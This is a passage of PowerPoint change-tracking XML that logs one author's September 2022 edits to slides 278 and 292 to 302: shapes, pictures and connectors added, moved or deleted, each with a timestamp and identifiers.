            <ac:spMk id="11" creationId="{4372FC8D-9108-435A-1521-2D1456F82507}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:17:21.336" v="858" actId="13926"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:graphicFrameMk id="5" creationId="{6ECCA2D6-DA15-B0BC-2C67-09F1C089C114}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:12:46.921" v="570" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1311166935" sldId="292"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:12:46.921" v="570" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1311166935" sldId="292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2:21.964" v="523" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1311166935" sldId="292"/>
            <ac:spMk id="6" creationId="{021DB960-2713-C71C-53BF-43DC1D9718AC}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:12:10.271" v="518"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3109776677" sldId="292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410643697" sldId="292"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:13:13.773" v="620" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1430027698" sldId="293"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:13:13.773" v="620" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1430027698" sldId="293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3:04.551" v="576" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1430027698" sldId="293"/>
            <ac:spMk id="6" creationId="{021DB960-2713-C71C-53BF-43DC1D9718A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806594951" sldId="293"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:12:10.271" v="518"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3380751176" sldId="293"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:13:28.039" v="668" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1771928653" sldId="294"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:13:28.039" v="668" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1771928653" sldId="294"/>
            <ac:spMk id="4" creationId="{0C9609F8-F29B-B7B4-D48D-3D146F22750B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:13:17.344" v="622" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1771928653" sldId="294"/>
            <ac:spMk id="6" creationId="{021DB960-2713-C71C-53BF-43DC1D9718A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4157974868" sldId="294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657834469" sldId="295"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:13:00.741" v="574" actId="680"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2812244905" sldId="295"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:26:15.280" v="3171" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3901228743" sldId="295"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:26:15.280" v="3171" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3901228743" sldId="295"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:23:15.002" v="3136" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3901228743" sldId="295"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:23:16.483" v="3137" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3901228743" sldId="295"/>
            <ac:spMk id="6" creationId="{6B2FDE53-B54F-DD48-5564-846A019778D4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:25:59.583" v="3146" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3901228743" sldId="295"/>
            <ac:picMk id="1026" creationId="{43F22C0A-D26E-5273-1140-AE04FC241209}"/>
          </ac:picMkLst>
        </pc:pic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63997470" sldId="296"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:38:22.501" v="3654" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3382763336" sldId="296"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:32:58.360" v="3331" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3382763336" sldId="296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38:22.501" v="3654" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3382763336" sldId="296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735965975" sldId="297"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add ord">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:14:13.311" v="677"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3875275752" sldId="297"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:16:05.670" v="784" actId="13926"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="80597609" sldId="298"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:16:05.670" v="784" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="80597609" sldId="298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974513580" sldId="298"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:10:28.364" v="2084" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2236454765" sldId="299"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:10:28.364" v="2084" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2236454765" sldId="299"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D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7" creationId="{50AED3AE-A3CA-FCFB-0B2F-E642A328FB8B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:40:24.116" v="971" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2236454765" sldId="299"/>
            <ac:spMk id="8" creationId="{81820606-FA4E-6776-327F-57E968778DDB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0" creationId="{41591102-5F02-C3D6-6E2E-9741AC66E255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4" creationId="{5F60B1EA-774C-5E80-AE60-CF5A86F380EA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5" creationId="{C76C5D15-7EE1-141A-011E-5C8FD6F86B4C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7" creationId="{2B31238C-60C3-384F-8FC3-03CC0C253950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19" creationId="{DE50556C-BF14-DA11-524C-FDC3043DAD03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1" creationId="{04E8958F-D71C-DE10-1ED7-65865098DF2C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3" creationId="{4B1F7F7B-D85E-E22A-19AB-A3474154C539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28" creationId="{26593B1B-0E56-2520-4862-3630A49923B1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:54:36.792" v="1705" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2236454765" sldId="299"/>
            <ac:spMk id="30" creationId="{7F5627DF-8D22-7B3F-8946-EEC1178F6C5E}"/>
          </ac:spMkLst>
        </pc:sp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3" creationId="{26A57681-B464-C011-E3EA-6F3E2D025A56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5" creationId="{26622AA9-236F-3C61-0B68-554958DC15E6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11" creationId="{FDB381F5-0E7B-3154-3528-4A9B1A02AC18}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:54:36.792" v="1705" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2236454765" sldId="299"/>
            <ac:picMk id="12" creationId="{A3343F79-1D78-33AB-EC5E-DFC83472F9A0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:39:55.274" v="968" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2236454765" sldId="299"/>
            <ac:picMk id="1026" creationId="{3329D95F-2DCB-65A1-EC34-A146940BA081}"/>
          </ac:picMkLst>
        </pc:pic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6" creationId="{F6A0EE37-507F-6230-B80B-B8C294DB5596}"/>
          </ac:cxnSpMkLst>
        </pc:cxn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13" creationId="{EE41070B-0486-8CD9-258B-40DF49EF044D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:54:36.792" v="1705" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2236454765" sldId="299"/>
            <ac:cxnSpMk id="16" creationId="{7C0F99DF-9798-02C1-216F-62F644C86D16}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:50:54.627" v="1409" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2236454765" sldId="299"/>
            <ac:cxnSpMk id="25" creationId="{00E42579-CDAD-8080-65C2-94EF012389C4}"/>
          </ac:cxnSpMkLst>
        </pc:cxn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588900546" sldId="299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147678590" sldId="300"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:15:24.417" v="2472" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2521007631" sldId="300"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:10:18.504" v="2052" actId="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2521007631" sldId="300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7" creationId="{50AED3AE-A3CA-FCFB-0B2F-E642A328FB8B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10" creationId="{41591102-5F02-C3D6-6E2E-9741AC66E255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4" creationId="{5F60B1EA-774C-5E80-AE60-CF5A86F380EA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5" creationId="{C76C5D15-7EE1-141A-011E-5C8FD6F86B4C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:52:59.900" v="1523" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2521007631" sldId="300"/>
            <ac:spMk id="17" creationId="{2B31238C-60C3-384F-8FC3-03CC0C253950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19" creationId="{DE50556C-BF14-DA11-524C-FDC3043DAD03}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:54:23.496" v="1704" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2521007631" sldId="300"/>
            <ac:spMk id="21" creationId="{04E8958F-D71C-DE10-1ED7-65865098DF2C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:53:40.082" v="1597" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2521007631" sldId="300"/>
            <ac:spMk id="23" creationId="{4B1F7F7B-D85E-E22A-19AB-A3474154C539}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:15:24.417" v="2472" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2521007631" sldId="300"/>
            <ac:spMk id="28" creationId="{26593B1B-0E56-2520-4862-3630A49923B1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:53:38.044" v="1596" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2521007631" sldId="300"/>
            <ac:spMk id="30" creationId="{7F5627DF-8D22-7B3F-8946-EEC1178F6C5E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:54:23.496" v="1704" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2521007631" sldId="300"/>
            <ac:picMk id="3" creationId="{26A57681-B464-C011-E3EA-6F3E2D025A56}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:54:23.496" v="1704" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2521007631" sldId="300"/>
            <ac:picMk id="5" creationId="{26622AA9-236F-3C61-0B68-554958DC15E6}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:53:38.044" v="1596" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2521007631" sldId="300"/>
            <ac:picMk id="11" creationId="{FDB381F5-0E7B-3154-3528-4A9B1A02AC18}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:53:38.044" v="1596" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2521007631" sldId="300"/>
            <ac:picMk id="12" creationId="{A3343F79-1D78-33AB-EC5E-DFC83472F9A0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:54:23.496" v="1704" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2521007631" sldId="300"/>
            <ac:cxnSpMk id="6" creationId="{F6A0EE37-507F-6230-B80B-B8C294DB5596}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:53:38.044" v="1596" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2521007631" sldId="300"/>
            <ac:cxnSpMk id="13" creationId="{EE41070B-0486-8CD9-258B-40DF49EF044D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:53:38.044" v="1596" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2521007631" sldId="300"/>
            <ac:cxnSpMk id="16" creationId="{7C0F99DF-9798-02C1-216F-62F644C86D16}"/>
          </ac:cxnSpMkLst>
        </pc:cxn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80065685" sldId="301"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:05:36.054" v="2000" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1190581667" sldId="301"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:56:57.397" v="1732" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1190581667" sldId="301"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:03:11.818" v="1818" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1190581667" sldId="301"/>
            <ac:spMk id="3" creationId="{BECC469F-7F3D-5DA4-E9A6-CD7F6336F48E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:03:14.246" v="1819" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1190581667" sldId="301"/>
            <ac:spMk id="6" creationId="{5DE08D44-3A2B-115D-653A-71637627B3E4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:05:36.054" v="2000" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1190581667" sldId="301"/>
            <ac:spMk id="7" creationId="{A2EA50A9-63E1-088A-3887-CB46259835B3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:56:50.769" v="1726" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1190581667" sldId="301"/>
            <ac:picMk id="1026" creationId="{3329D95F-2DCB-65A1-EC34-A146940BA081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0" creationId="{5705B5D3-9953-7666-0D23-2B200150CA17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2" creationId="{5D5C9C75-CB6A-98A6-57E4-5F7B36671E53}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:02:47.814" v="1764" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1190581667" sldId="301"/>
            <ac:picMk id="2054" creationId="{E0A31BB3-BDE6-1BDC-4CDF-D0409845D5C0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:22:03.368" v="3112" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2873266326" sldId="302"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:22:03.368" v="3112" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2873266326" sldId="302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0:13:27.837" v="2400" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2873266326" sldId="302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174773230" sldId="302"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:09:19.380" v="2031" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3996632031" sldId="302"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:08:35.278" v="2021" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3996632031" sldId="302"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:09:08.128" v="2030" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3996632031" sldId="302"/>
            <ac:spMk id="3" creationId="{AAD2C074-4C1E-472D-DC10-9F9C45FC287A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:08:36.789" v="2022" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3996632031" sldId="302"/>
            <ac:picMk id="1026" creationId="{3329D95F-2DCB-65A1-EC34-A146940BA081}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:08:48.587" v="2027" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3996632031" sldId="302"/>
            <ac:picMk id="6146" creationId="{A58DFD81-C66B-8851-0A5F-4E9778212264}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
